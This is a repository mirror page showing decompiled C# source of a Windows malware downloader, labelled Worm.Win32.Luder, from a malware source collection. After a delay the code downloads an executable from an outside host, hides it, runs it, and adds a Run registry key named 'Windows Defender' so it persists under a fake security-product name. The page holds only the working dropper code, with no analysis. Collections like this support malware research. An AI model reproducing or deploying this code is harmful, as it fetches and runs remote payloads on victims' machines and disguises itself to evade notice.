mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-24 20:35:25 +00:00
f2ac1ece55
add
35 lines
1.1 KiB
C#
35 lines
1.1 KiB
C#
// Decompiled with JetBrains decompiler
|
|
// Type: CaptainBri.Program
|
|
// Assembly: downloader, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
// MVID: 0E31E51F-2748-4D91-852B-4BE7B4A0BDF2
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.Win32.Luder.cdal-b48d5feedcae179b4853e6cf4a44d6dd21e468c6edb9558388e6d820513360d4.exe
|
|
|
|
using Microsoft.Win32;
|
|
using System;
|
|
using System.Diagnostics;
|
|
using System.IO;
|
|
using System.Net;
|
|
using System.Threading;
|
|
|
|
namespace CaptainBri
|
|
{
|
|
internal static class Program
|
|
{
|
|
private static void Main()
|
|
{
|
|
try
|
|
{
|
|
Thread.Sleep(300000);
|
|
string str = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\downloaded.exe";
|
|
new WebClient().DownloadFile("http://endoftheinternet.fileave.com/BIN/SN/dllhost.exe", str);
|
|
System.IO.File.SetAttributes(str, FileAttributes.Hidden);
|
|
Process.Start(str);
|
|
Registry.SetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "Windows Defender", (object) str);
|
|
}
|
|
catch
|
|
{
|
|
}
|
|
}
|
|
}
|
|
}
|